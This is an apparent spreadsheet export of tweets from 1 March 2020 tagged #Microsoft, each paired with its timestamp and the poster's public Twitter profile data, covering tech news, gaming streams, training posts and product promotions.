    <t>{'id': 964826293, 'id_str': '964826293', 'name': 'Global Banking &amp; Finance Review', 'screen_name': 'GBAFReview', 'location': 'Global', 'description': 'Official Twitter account of https://t.co/WdYIXt6YPA your guide to personal and professional financial success. Informing and inspiring', 'url': 'http://t.co/5FxlCKxz9z', 'entities': {'url': {'urls': [{'url': 'http://t.co/5FxlCKxz9z', 'expanded_url': 'http://www.globalbankingandfinance.com', 'display_url': 'globalbankingandfinance.com', 'indices': [0, 22]}]}, 'description': {'urls': [{'url': 'https://t.co/WdYIXt6YPA', 'expanded_url': 'https://www.globalbankingandfinance.com', 'display_url': 'globalbankingandfinance.com', 'indices': [28, 51]}]}}, 'protected': False, 'followers_count': 12456, 'friends_count': 12484, 'listed_count': 130, 'created_at': 'Thu Nov 22 19:22:22 +0000 2012', 'favourites_count': 1052, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 32854, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5EFCE', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/604270222170718209/1-3j6L9E_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/604270222170718209/1-3j6L9E_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/964826293/1531847829', 'profile_link_color': 'C40A0A', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': '78C0A8', 'profile_text_color': '5E412F', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Sun Mar 01 02:58:22 +0000 2020</t>
  </si>
  <si>
    <t>Sun Mar 01 02:55:38 +0000 2020</t>
  </si>
  <si>
    <t>Innovating to drive the future of intelligent retail
#Retail #Microsoft
https://t.co/BUWhwmRbyQ</t>
  </si>
  <si>
    <t>Innovating to drive the future of intelligent retail
#The Official Microsoft Blog #Microsoft
https://t.co/BUWhwmRbyQ</t>
  </si>
  <si>
    <t>Sun Mar 01 02:55:37 +0000 2020</t>
  </si>
  <si>
    <t>Innovating to drive the future of intelligent retail
#Featured #Microsoft
https://t.co/BUWhwmRbyQ</t>
  </si>
  <si>
    <t>Sun Mar 01 02:55:36 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft will be carbon negative by 2030
#Environment #Microsoft
https://t.co/eZofW9TiOb</t>
  </si>
  <si>
    <t>Sun Mar 01 02:55:33 +0000 2020</t>
  </si>
  <si>
    <t>Sun Mar 01 02:55:32 +0000 2020</t>
  </si>
  <si>
    <t>Sun Mar 01 02:55:31 +0000 2020</t>
  </si>
  <si>
    <t>Sun Mar 01 02:55:30 +0000 2020</t>
  </si>
  <si>
    <t>Sun Mar 01 02:55:29 +0000 2020</t>
  </si>
  <si>
    <t>Sun Mar 01 02:55:27 +0000 2020</t>
  </si>
  <si>
    <t>Sun Mar 01 02:55:26 +0000 2020</t>
  </si>
  <si>
    <t>Sun Mar 01 02:55:24 +0000 2020</t>
  </si>
  <si>
    <t>Sun Mar 01 02:55:23 +0000 2020</t>
  </si>
  <si>
    <t>Sun Mar 01 02:55:22 +0000 2020</t>
  </si>
  <si>
    <t>Sun Mar 01 02:55:21 +0000 2020</t>
  </si>
  <si>
    <t>Sun Mar 01 02:55:20 +0000 2020</t>
  </si>
  <si>
    <t>Sun Mar 01 02:55:19 +0000 2020</t>
  </si>
  <si>
    <t>Sun Mar 01 02:55:18 +0000 2020</t>
  </si>
  <si>
    <t>Sun Mar 01 02:55:17 +0000 2020</t>
  </si>
  <si>
    <t>Sun Mar 01 02:55:16 +0000 2020</t>
  </si>
  <si>
    <t>Sun Mar 01 02:55:15 +0000 2020</t>
  </si>
  <si>
    <t>Sun Mar 01 02:55:14 +0000 2020</t>
  </si>
  <si>
    <t>Sun Mar 01 02:25:51 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #Windows10 #Insider #Slow #Intel #RST #Steam #Problems
-On theirtain moments, this happened to me usually when suddenly Steam finished an update of a game, my physical HDD, not SSD, disapears from everything until a reboot. https://t.co/eqRg8aIxjG</t>
  </si>
  <si>
    <t>{'id': 437541294, 'id_str': '437541294', 'name': 'Ricardo Estep', 'screen_name': 'Ricardo_estep', 'location': 'Entrevias', 'description': '24. Trust me, voy a ser ingeniero... El mismo de todos los lados... -- áƒš(â—‰â—žà±ªâ—Ÿâ—‰ )áƒš --- (ãƒ»_ãƒ»)(ãƒ»ã€‚ãƒ»)(ãƒ»_ãƒ») --', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 506, 'friends_count': 357, 'listed_count': 18, 'created_at': 'Thu Dec 15 14:48:46 +0000 2011', 'favourites_count': 112287, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 53251,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'http://pbs.twimg.com/profile_images/780732597315969025/JayYQVkk_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/780732597315969025/JayYQVkk_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/437541294/1464495263', 'profile_link_color': 'F20505',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</si>
  <si>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Sun Mar 01 02:23:41 +0000 2020</t>
  </si>
  <si>
    <t>XBOX Live $100 Gift Card For $90 - #1 Best XBOX Live Deal https://t.co/FhGq6kkkgr via @realmralanc #Xbox #XboxLive #Deal #Deals #Gamers #Microsoft #XBOXDeal #XboxGames</t>
  </si>
  <si>
    <t>{'id': 44219804, 'id_str': '44219804', 'name': 'Alan Craker', 'screen_name': 'RealMrAlanC', 'location': 'Eau Claire, WI', 'description': 'Alan Craker known on YouTube as MrAlanC. Most commonly recognized as Player Well Known North America @pubgmobile (2018). Contact RealMrAlanC@gmail.com', 'url': 'https://t.co/tLfYade0BX', 'entities': {'url': {'urls': [{'url': 'https://t.co/tLfYade0BX', 'expanded_url': 'http://MrAlanC.com', 'display_url': 'MrAlanC.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 41507, 'friends_count': 38, 'listed_count': 70, 'created_at': 'Tue Jun 02 22:00:53 +0000 2009', 'favourites_count': 3157, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 63787,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'http://pbs.twimg.com/profile_images/1180339235456454657/bkh662Rv_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1180339235456454657/bkh662Rv_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/44219804/1570249753',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</si>
  <si>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02:20:44 +0000 2020</t>
  </si>
  <si>
    <t>Warning Issued For Millions Of #Microsoft Windows 10 Users https://t.co/j63hCM99ay</t>
  </si>
  <si>
    <t>{'id': 2885272923, 'id_str': '2885272923', 'name': 'ÊÉ‘É±3Å¡ É—Ê€É‘gâ­•ï¸É³', 'screen_name': 'Jam3sDrag0n', 'location': 'Moments Ripple', 'description': '#AnonFamily #Anonymous #StopChildAbuse #AntiBully #Op4Pawz #OpFunKill #OpKillingBay #OpBeast', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 622, 'friends_count': 733, 'listed_count': 15, 'created_at': 'Thu Nov 20 04:52:38 +0000 2014', 'favourites_count': 1061, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1533,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'http://pbs.twimg.com/profile_images/1001027513185984514/s5n4z9WS_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1001027513185984514/s5n4z9WS_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2885272923/1527498534', 'profile_link_color': '842DCE',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</si>
  <si>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Sun Mar 01 02:12:27 +0000 2020</t>
  </si>
  <si>
    <t>Hey guys, it's #Titanfall2 Time with @JimBoSox13 and Friendos for @g1_Gamedays.  Pass it on and come on down!  #g1Nation #Titanfall #Respawn #EA #NotApex #Microsoft #Xbox #SupportSmallStreamers
https://t.co/Ecvu2hz80N</t>
  </si>
  <si>
    <t>Sun Mar 01 02:01:44 +0000 2020</t>
  </si>
  <si>
    <t>I know the skills I've learned as a result will help catapult my success, and for that I am truly grateful. Thankful @maldivegas  for giving me the chance to partake "Advanced MS Excel for Business". 
Thank you sir 
Ibrahim Hulail 
#fec 
#Training 
#microsoft 
#excel https://t.co/yaUNxwvBMZ</t>
  </si>
  <si>
    <t>{'id': 3999906746, 'id_str': '3999906746', 'name': 'Hassan Ali Manik ðŸ‘‘', 'screen_name': 'JazeeraaKing', 'location': 'Maldives', 'description': 'ðŸ’›Raees NasheedðŸ’›Raees IbuðŸ’›JazeeraaKingðŸ’›', 'url': 'https://t.co/covY2xnUew', 'entities': {'url': {'urls': [{'url': 'https://t.co/covY2xnUew', 'expanded_url': 'https://jazeeraaking.sarahah.com/', 'display_url': 'jazeeraaking.sarahah.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 409, 'friends_count': 2253, 'listed_count': 0, 'created_at': 'Sat Oct 24 07:29:44 +0000 2015', 'favourites_count': 2584, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1330,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'http://pbs.twimg.com/profile_images/1114868785410785281/r5dAg0wp_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1114868785410785281/r5dAg0wp_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3999906746/1560689064',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</si>
  <si>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01:55:41 +0000 2020</t>
  </si>
  <si>
    <t>What is the official logo for #PowerShell7 ?
...and where can I download .png and .gifs of the logo? 
#PowerShell #Microsoft @Steve_MSFT @adilio</t>
  </si>
  <si>
    <t>Sun Mar 01 01:40:03 +0000 2020</t>
  </si>
  <si>
    <t>Run your legacy #Java #apps in the new #Microsoft #Edge https://t.co/MWXPNPbocC via @techhelpkb</t>
  </si>
  <si>
    <t>Sun Mar 01 01:29:57 +0000 2020</t>
  </si>
  <si>
    <t>2v2 Gunfight Tournament with https://t.co/u2iVPwg9Hm #CallofDutyModernWarfare #callofduty #tournament #frps #xbox #microsoft #playstation #SaturdayMood #twitch #twitchtv #twitchcommunity #live</t>
  </si>
  <si>
    <t>Sun Mar 01 01:27:59 +0000 2020</t>
  </si>
  <si>
    <t>@RepDelBene Tell microsoft to go full WFH #Microsoft #COVID19US Keep softies SAFE</t>
  </si>
  <si>
    <t>{'id': 1262509050, 'id_str': '1262509050', 'name': 'I wont vote GOP for dog catcher at this point.', 'screen_name': 'SoloChooWookie', 'location': '', 'description': 'Cheat, draft dodger, pussy grabber, porn star pay off, CROOK...IMPEACHED LOSER #ImpeachmentDay #DumpTrump \n@SenateGOP\n #WHEREISTHELINE', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 38, 'friends_count': 244, 'listed_count': 0, 'created_at': 'Tue Mar 12 17:53:57 +0000 2013', 'favourites_count': 4928, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2450,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'http://pbs.twimg.com/profile_images/891391383050661888/pK9nyj_v_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/891391383050661888/pK9nyj_v_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1262509050/1501359293',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</si>
  <si>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01:26:40 +0000 2020</t>
  </si>
  <si>
    <t>2v2 Gunfight Tournament!  | 129/200 Followers! https://t.co/91xnNI1cB2 #CallofDutyModernWarfare #callofduty #tournament #frps #xbox #microsoft #playstation #SaturdayMood #twitch #twitchtv #twitchcommunity #live</t>
  </si>
  <si>
    <t>Sun Mar 01 01:15:18 +0000 2020</t>
  </si>
  <si>
    <t>AlpsLogic IT Solutions has experience &amp;amp; expertise in a broad range of Microsoft technologies and languages  #USA #Canada #hustle #business #entrepreneur #motivation #remote #nomad #angular #Azure #SharePoint #Dotnet #MVC #Microsoft #Technologies https://t.co/kTNU5MjGaM</t>
  </si>
  <si>
    <t>Sun Mar 01 01:13:19 +0000 2020</t>
  </si>
  <si>
    <t>On an 8-core, 4.5GHz i7 PC with 32GB RAM, shouldn't  Collections on the Edge browser load as fast as Sonic The Hedgehog runs?  Currently takes 3 seconds, which seems off. #Microsoft @MicrosoftEdge</t>
  </si>
  <si>
    <t>{'id': 786342348045193216, 'id_str': '786342348045193216', 'name': 'ðŸ†…ðŸ…¸ðŸ…º', 'screen_name': 'vikviews', 'location': 'Houston, TX', 'description': 'Technology executive, finder and maker of ways, and quesadilla maker. My random thoughts, cloud technology, development, privacy, AI ðŸ‘¨\u200dðŸ’»ðŸ‡³ðŸ‡´ ðŸ‡»ðŸ‡ª ðŸ‡ºðŸ‡¸', 'url': 'https://t.co/d6KVrilIUG', 'entities': {'url': {'urls': [{'url': 'https://t.co/d6KVrilIUG', 'expanded_url': 'http://oyvindvik.com', 'display_url': 'oyvindvik.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 132, 'friends_count': 162, 'listed_count': 10, 'created_at': 'Wed Oct 12 23:06:40 +0000 2016', 'favourites_count': 812, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 650,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'http://pbs.twimg.com/profile_images/1221642461514215426/thITOkgQ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1221642461514215426/thITOkgQ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/786342348045193216/1477691959',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</si>
  <si>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01:05:03 +0000 2020</t>
  </si>
  <si>
    <t>Do you fully understand the #security and #compliance needs of your organization? 
In this blog you'll get to download the whitepaper as well as watch the recording of a panel of #Microsoft experts who answer an abundance of your questions!
https://t.co/9cBcH3U1sY https://t.co/kC6CppeZ76</t>
  </si>
  <si>
    <t>{'id': 110114670, 'id_str': '110114670', 'name': 'RecordPoint', 'screen_name': 'RecordPoint', 'location': 'Seattle, WA', 'description': 'The trusted and industry-standard experts on intelligent #RecordsManagement and #Compliance. #Office365, #SharePoint, #MachineLearning.', 'url': 'https://t.co/gv7qPlLCgg', 'entities': {'url': {'urls': [{'url': 'https://t.co/gv7qPlLCgg', 'expanded_url': 'http://www.recordpoint.com', 'display_url': 'recordpoint.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 661, 'friends_count': 480, 'listed_count': 36, 'created_at': 'Sun Jan 31 11:34:58 +0000 2010', 'favourites_count': 639, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3122,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'http://pbs.twimg.com/profile_images/1082383557362761728/YVJwpBFx_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1082383557362761728/YVJwpBFx_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/110114670/1565919109',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</si>
  <si>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Sun Mar 01 01:00:13 +0000 2020</t>
  </si>
  <si>
    <t>My personal website. Senior Software Engineer. Specialized in #Microsoft Technologies including #dotnet #dotnetcore &amp;amp; #Azure 
https://t.co/bXH8SPnIBs https://t.co/UZwhH1jTNC</t>
  </si>
  <si>
    <t>Sun Mar 01 01:00:05 +0000 2020</t>
  </si>
  <si>
    <t>At Microsoft employees their our greatest asset. Here's how their investing in #technology and #culture to #transform their experience. #Microsoft #Microsoft365...    #Avtex https://t.co/W2jp30aF9E</t>
  </si>
  <si>
    <t>Sun Mar 01 00:57:32 +0000 2020</t>
  </si>
  <si>
    <t>#Apple #Microsoft #Laptops 8 of the best laptop brands for 2020 https://t.co/qegu1m2Dh3 https://t.co/vECSr8Yh7N</t>
  </si>
  <si>
    <t>Sun Mar 01 00:56:08 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve"> But more wonderful than the lore of books is the secret lore of the ocean #HPLovecraft
Books and Water; the way to spend a Sunday.
What are you doing to recharge this weekend friends? 
#LinkedIn #Microsoft... https://t.co/nCLZg4wf2R</t>
  </si>
  <si>
    <t>{'id': 3129971671, 'id_str': '3129971671', 'name': 'Cullen P. Haynes', 'screen_name': 'Cullen_P_Haynes', 'location': 'Sydney', 'description': 'Sales Executive | MBA | Book-Addict | Runner | Energy, Passion and Bias for 10X Action', 'url': 'https://t.co/qxY4rF6gNC', 'entities': {'url': {'urls': [{'url': 'https://t.co/qxY4rF6gNC', 'expanded_url': 'http://linkedin.com/in/cullen-p-haynes-796212107', 'display_url': 'linkedin.com/in/cullen-p-haâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 87, 'friends_count': 174, 'listed_count': 0, 'created_at': 'Thu Apr 02 10:52:14 +0000 2015', 'favourites_count': 271, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1528,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'http://pbs.twimg.com/profile_images/1007952349527076865/5Fjn7o38_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1007952349527076865/5Fjn7o38_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3129971671/1529149789',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</si>
  <si>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00:53:29 +0000 2020</t>
  </si>
  <si>
    <t>Most days I despise #Java and #csharp, mainly bc they're controlled by #Oracle and #Microsoft</t>
  </si>
  <si>
    <t>Sun Mar 01 00:52:10 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft further details the enhanced machine learning capabilities in SQL Server 2019 #sqlserver2019 #microsoft: https://t.co/ihfAOMNfzQ</t>
  </si>
  <si>
    <t>{'id': 17218105, 'id_str': '17218105', 'name': 'James Townsend', 'screen_name': 'jamestownsend', 'location': 'Washington, DC', 'description': 'President @InfoStrat, #PowerAddict author of  https://t.co/D4RpeaYyhF on Dynamics, Power Apps and software development topics', 'url': 'https://t.co/spzpzCpcYn', 'entities': {'url': {'urls': [{'url': 'https://t.co/spzpzCpcYn', 'expanded_url': 'http://www.infostrat.com/solutions', 'display_url': 'infostrat.com/solutions', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/D4RpeaYyhF', 'expanded_url': 'http://blogs.InfoStrat.com', 'display_url': 'blogs.InfoStrat.com', 'indices': [46, 69]}]}}, 'protected': False, 'followers_count': 13915, 'friends_count': 11978, 'listed_count': 1045, 'created_at': 'Thu Nov 06 20:05:19 +0000 2008', 'favourites_count': 1882, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 97211,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'http://pbs.twimg.com/profile_images/1212740937543233536/ayDnmIeF_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1212740937543233536/ayDnmIeF_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/17218105/1568062253',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</si>
  <si>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Sun Mar 01 00:36:24 +0000 2020</t>
  </si>
  <si>
    <t>Well this is a blast from the past... who knew there was an online WordArt Generator. 
Relive the joy of Windows 95 era #Microsoft Word! 
https://t.co/EbAFmCe44P https://t.co/kCHiZ6pFsx</t>
  </si>
  <si>
    <t>{'id': 23413264, 'id_str': '23413264', 'name': 'Kathleen Morris ðŸ‡¦ðŸ‡º', 'screen_name': 'kathleen_morris', 'location': 'Geelong, Australia', 'description': 'Primary school teacher, blogger, and mum. \n#Blogging #GlobalEd #EdTech #DitCit. ðŸŒ\nLeading the Student Blogging Challenge #STUBC', 'url': 'https://t.co/Sb8PUv97E2', 'entities': {'url': {'urls': [{'url': 'https://t.co/Sb8PUv97E2', 'expanded_url': 'http://www.kathleenamorris.com', 'display_url': 'kathleenamorris.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 10085, 'friends_count': 7967, 'listed_count': 351, 'created_at': 'Mon Mar 09 07:40:02 +0000 2009', 'favourites_count': 3651, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 12179,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'http://pbs.twimg.com/profile_images/953574141713530880/EJI7JlJr_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/953574141713530880/EJI7JlJr_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/23413264/1547333975',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</si>
  <si>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00:32:16 +0000 2020</t>
  </si>
  <si>
    <t>MSCloud: #MicrosoftAutomotive has the potential to provide tangible, cost-saving benefits to autonomous vehicle technology. Discover how in this white paper by #Microsoft and Frost &amp;amp; Sullivan: https://t.co/FgIenxCgt3 https://t.co/8Qh2o37ShY</t>
  </si>
  <si>
    <t>{'id': 737481028344778752, 'id_str': '737481028344778752', 'name': 'Int Technology', 'screen_name': 'IntTechAU', 'location': 'Sydney, New South Wales', 'description': 'IT Solution, Cloud Solution, Technology', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 50, 'friends_count': 0, 'listed_count': 162, 'created_at': 'Tue May 31 03:09:13 +0000 2016', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 11270,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</si>
  <si>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Sun Mar 01 00:32:00 +0000 2020</t>
  </si>
  <si>
    <t>Looking for a quick guide to get hands-on knowledge of #Microsoft #Azure? Weve got you covered https://t.co/VF26IId8ev!
#cloud #AWS #IoT #CloudComputing #SundayMotivation</t>
  </si>
  <si>
    <t>Sun Mar 01 00:28:01 +0000 2020</t>
  </si>
  <si>
    <t>Such an amazing day with #cybertechgirls at #coastlinecc with swag from #synack, #signalsciences, #rsac, and #microsoft. 60 girls know more about cybersecurity now thanks to all of our mentors! #womenincyber #wicys #wsc #wicyssocal https://t.co/Zwhm203KPA</t>
  </si>
  <si>
    <t>{'id': 3250914834, 'id_str': '3250914834', 'name': 'Malia (she/her)', 'screen_name': 'veteran_hiker', 'location': '', 'description': 'CEO &amp; Co-Founder of Integrum / President &amp; Co-Founder of WiCyS SoCal / Tech Chair of AnitaBorg / Executive Director of Engagement &amp; Digital Inclusion of XRSI', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 69, 'friends_count': 69, 'listed_count': 2, 'created_at': 'Sat Jun 20 20:39:45 +0000 2015', 'favourites_count': 373, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1224464829219389440/JnGagbTt_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1224464829219389440/JnGagbTt_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3250914834/1580770140',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</si>
  <si>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Sun Mar 01 00:25:39 +0000 2020</t>
  </si>
  <si>
    <t>Azure Blockchain Hands-on Lab  #Microsoft Cloud Workshop
 #Cryptocurrency #ledger #MCW #Solidity #Azure
https://t.co/6QFLso9bBH</t>
  </si>
  <si>
    <t>Sun Mar 01 00:13:48 +0000 2020</t>
  </si>
  <si>
    <t>Im live, folks! Gonna try to bang out #CallofCathulhu tonight! Come take a peak! https://t.co/447QVbXElc #twitch #twitchstreamer #streamer #gamerstud #gamepass #xbox #xboxlive #microsoft #gamer #funtimes #gamevibes #sony #psn</t>
  </si>
  <si>
    <t>{'id': 182555231, 'id_str': '182555231', 'name': 'Savielo', 'screen_name': 'XDCaraballo', 'location': 'Dallas, TX', 'description': 'Gamer. Movie guy. Other things? Buzzwords? Are you following yet? Come watch at https://t.co/wnQdrnnYb1 !', 'url': 'https://t.co/wnQdrnnYb1', 'entities': {'url': {'urls': [{'url': 'https://t.co/wnQdrnnYb1', 'expanded_url': 'http://twitch.tv/savielo', 'display_url': 'twitch.tv/savielo', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/wnQdrnnYb1', 'expanded_url': 'http://twitch.tv/savielo', 'display_url': 'twitch.tv/savielo', 'indices': [80, 103]}]}}, 'protected': False, 'followers_count': 134, 'friends_count': 384, 'listed_count': 0, 'created_at': 'Tue Aug 24 21:43:57 +0000 2010', 'favourites_count': 2096, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1014,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'http://pbs.twimg.com/profile_images/979258218273755137/T-mFkYXa_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/979258218273755137/T-mFkYXa_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/182555231/1497620801',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</si>
  <si>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Sun Mar 01 00:10:03 +0000 2020</t>
  </si>
  <si>
    <t>Our select set of technologies complement and add value to our clients #Microsoft based networks. #SMB #productivity #security https://t.co/CBv72O5Wgx</t>
  </si>
  <si>
    <t>{'id': 394862996, 'id_str': '394862996', 'name': 'Netcetera Consulting', 'screen_name': 'NetceteraCanada', 'location': 'Vancouver, British Columbia', 'description': 'Established in 1999, Netcetera has been providing computer technology services and products to customers for over 17 years.', 'url': 'https://t.co/vunDSVXRiO', 'entities': {'url': {'urls': [{'url': 'https://t.co/vunDSVXRiO', 'expanded_url': 'http://www.netcetera.ca/', 'display_url': 'netcetera.ca', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 166, 'friends_count': 274, 'listed_count': 28, 'created_at': 'Thu Oct 20 19:01:58 +0000 2011', 'favourites_count': 194, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2188,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'http://pbs.twimg.com/profile_images/775379492588036097/rNEcOcJS_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/775379492588036097/rNEcOcJS_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/394862996/1473700102',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</si>
  <si>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Sun Mar 01 00:09:03 +0000 2020</t>
  </si>
  <si>
    <t>&amp;lt;3 Race Community KW 09 &amp;lt;3
#twitch #xboxdach #xboxseniorsgermany #thrustmaster #bmw #bmwm3 #streamer #th8ashifter #thrustmastertx #speedmaster #turn10studios #gamepass #microsoft #forzahorizon4 #errorsquad #couchcrew #FordMustang #Nissan #Porsche #Toyota 
https://t.co/RakTZfLWdr</t>
  </si>
  <si>
    <t>{'id': 2908280387, 'id_str': '2908280387', 'name': 'CouchCrew', 'screen_name': 'Kill11Kenny', 'location': 'Rheinland-Pfalz, Deutschland', 'description': 'https://t.co/JT7HO8f8D9', 'url': 'https://t.co/KcXzxVRlSA', 'entities': {'url': {'urls': [{'url': 'https://t.co/KcXzxVRlSA', 'expanded_url': 'https://www.facebook.com/couchcrewtv', 'display_url': 'facebook.com/couchcrewtv', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/JT7HO8f8D9', 'expanded_url': 'http://www.twitch.tv/couchcrewtv', 'display_url': 'twitch.tv/couchcrewtv', 'indices': [0, 23]}]}}, 'protected': False, 'followers_count': 69, 'friends_count': 51, 'listed_count': 1, 'created_at': 'Sat Dec 06 20:39:09 +0000 2014', 'favourites_count': 613, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 926,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'http://pbs.twimg.com/profile_images/1016376380739784709/PXceib45_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1016376380739784709/PXceib45_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2908280387/1516437504',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</si>
  <si>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Sun Mar 01 00:00:32 +0000 2020</t>
  </si>
  <si>
    <t>Adam Bosworth, a veteran tech executive known for his work at companies including #Microsoft, #Salesforce and #Google, is leaving his role as an #AWS vice president but says the mysterious project he has been leading will be unveiled relatively soon". https://t.co/hynStmYhyk</t>
  </si>
  <si>
    <t>Sun Mar 01 00:00:04 +0000 2020</t>
  </si>
  <si>
    <t>Often associated with doomsday scenarios, AI is helping working parents manage work/life balance. #Microsoft https://t.co/FlPS04qkrg #MSFTAdvocate</t>
  </si>
  <si>
    <t>{'id': 151719213, 'id_str': '151719213', 'name': 'Nakib MCTâ˜ðŸ‡§ðŸ‡©ðŸŒ', 'screen_name': 'nakib_juris', 'location': 'Dhaka, Bangladesh', 'description': 'Youth Leader, Cloud Evangelist | Ex-Microsoftie @Azure #Cloud #O365. Technology Geek ðŸ¤“ advisor. Speaker audience Evangelism. #MCT', 'url': 'https://t.co/zqciYNFAY8', 'entities': {'url': {'urls': [{'url': 'https://t.co/zqciYNFAY8', 'expanded_url': 'https://www.linkedin.com/in/nakibjuris/', 'display_url': 'linkedin.com/in/nakibjuris/', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 899, 'friends_count': 728, 'listed_count': 131, 'created_at': 'Fri Jun 04 02:37:33 +0000 2010', 'favourites_count': 2982, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5270, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'DD2E44', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme2/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme2/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1011456243834093568/aEcfAd2G_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1011456243834093568/aEcfAd2G_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/151719213/1526572112',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</si>
  <si>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Sun Mar 01 00:00:00 +0000 2020</t>
  </si>
  <si>
    <t>#HedgeFund firm #Pioneer Investments largest buys of #Q42019, #Microsoft Corp. $MSFT https://t.co/CdPwRE17OJ</t>
  </si>
  <si>
